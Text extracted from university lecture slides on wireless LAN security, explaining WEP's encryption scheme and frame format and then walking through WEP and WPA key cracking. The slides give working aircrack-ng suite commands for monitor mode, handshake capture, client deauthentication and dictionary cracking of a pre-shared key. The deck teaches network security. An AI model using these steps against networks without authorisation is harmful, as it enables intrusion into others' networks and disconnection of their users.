1

WLAN Security: Cracking WEP/WPA

รศ. ดร. อนันต์ ผลเพิ่ม

Assoc. Prof. Anan Phonphoem, Ph.D. anan.p@ku.ac.th

http://www.cpe.ku.ac.th/~anan

Computer Engineering Department

Kasetsart University, Bangkok, Thailand

Wireless LANs 2011

WEP Block Diagram

2

WEP Frame

Integrity Algorithm (CRC-32)

Pseudo-Random Number Generator

RC-4

+

Bitwise XOR

Plain Text

Cipher Text

Integrity Check Value (ICV)

Key Sequence

Secret Key (40-bit or 128-bit)

Initialization Vector (IV)

IV

Encryption Block

Sender Site

Integrity Algorithm

Pseudo-Random Number Generator

Bitwise XOR

Cipher Text

Plain Text

Integrity Check Value (ICV)

Key Sequence

IV

Secret Key (40-bit or 128-bit)

Decryption Block

Receiver Site

3

WEP – Encoding

Integrity Algorithm (CRC-32)

Pseudo-Random Number Generator

RC-4

+

Bitwise XOR

Plain Text

Cipher Text

Integrity Check Value (ICV)

Key Sequence

Secret Key (40-bit or 128-bit)

Initialization Vector (IV)

IV

4

WEP Frame

Frame Header

IV Header

Frame Body ICV

Trailer FCS

Encrypted Clear Text Clear Text

4 bytes 4 bytes

5

WEP – Decryption

Integrity Algorithm

Pseudo-Random Number Generator

Bitwise XOR

Cipher Text

Plain Text

Integrity Check Value (ICV)

Key Sequence

IV

Secret Key (40-bit or 128-bit)

Cracking WEP

6

7

Cracking Steps

1) Reconnaissance (Collect target info.) [kismet]

2) Run promiscuous mode [iwconfig, airmon]

3) Collect data [airodump]

4) Crack key [aircrack]

8

Default SSIDs

9

1) Reconnaissance (Collect target info.)

10

Kismet (Reconnaissance)

11

Kismet (AP Info.)

12

Kismet (Client Info.)

13

2) Run promiscuous mode

14

1 2

3 4

Regular Behavior

Station 1 transmits to all (broadcast)

15

1 2

3 4

Intention to Eavesdrop

Promiscuous

mode

Station 1 transmits to station 4

16

iwconfig

17

Promiscuous Mode Setup

18

3) Collect data

19

airodump

From Kismet

Airodump problem

root@APMoose:~/toulouse# airodump-ng mon0

ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill

/dev/rfkill is “Linux ‘s Subsystem kernel for controlling radio transmisster (activated/deactivated)”

anan@APMoose:~$ rfkill list

0: phy0: Wireless LAN

Soft blocked: no software can reactivate

Hard blocked: no software cannot reactivate

1: acer-wireless: Wireless LAN

Soft blocked: no

Hard blocked: no

2: acer-bluetooth: Bluetooth

Soft blocked: no

Hard blocked: no

4: hci0: Bluetooth

Soft blocked: no

Hard blocked: no

Solve by:

root@APMoose:~/toulouse# rfkill unblock all

20

21

airodump

22

airodump data files

23

4) Crack Key

24

aircrack

25

WEP Cracking Demo

Cracking WPA

26

Cracking Steps

1)Start the wireless interface in monitor mode on the specific AP channel

2)Start airodump-ng on AP channel with filter for bssid to collect authentication handshake

3)Use aireplay-ng to deauthenticate the wireless client

4)Run aircrack-ng to crack the pre-shared key using the authentication handshake

27 http://www.aircrack-ng.org/doku.php?id=cracking_wpa

28

1) Start Monitoring Mode

Check interface

29

iwconfig

30

Start monitoring mode

31

32

2) Start airodump-ng collect authentication handshake

Start airodump-ng

33

Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0

Parameter Description

-c 6 Wireless channel

--bssid 00:1E:F7:xx:xx:xx AP’s MAC

-w psk File name prefix (contain Ivs)

mon0 Interface name

Start airodump-ng less parameter

34

Moose# airodump-ng -w psk mon0

35

3) Deauthenticate client

aireplay

36

Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0

Parameter Description

-0 deauthentication

1 # deauthentication sent

-a 00:12:01:xx:xx:xx AP’s MAC

-c 00:23:11:xx:xx:xx Deauthing client’s MAC-

mon0 Interface name

37

4) Crack

Need a dictionary

38

Moose# aircrack-ng –b 00:12:01:xx:xx:xx -psk*.cap

With dictionary

39

Moose# aircrack-ng -w password.lst -psk*.cap

Handshake found

40 http://www.aircrack-ng.org/doku.php?id=cracking_wpa

Successfully Crack

41 http://www.aircrack-ng.org/doku.php?id=cracking_wpa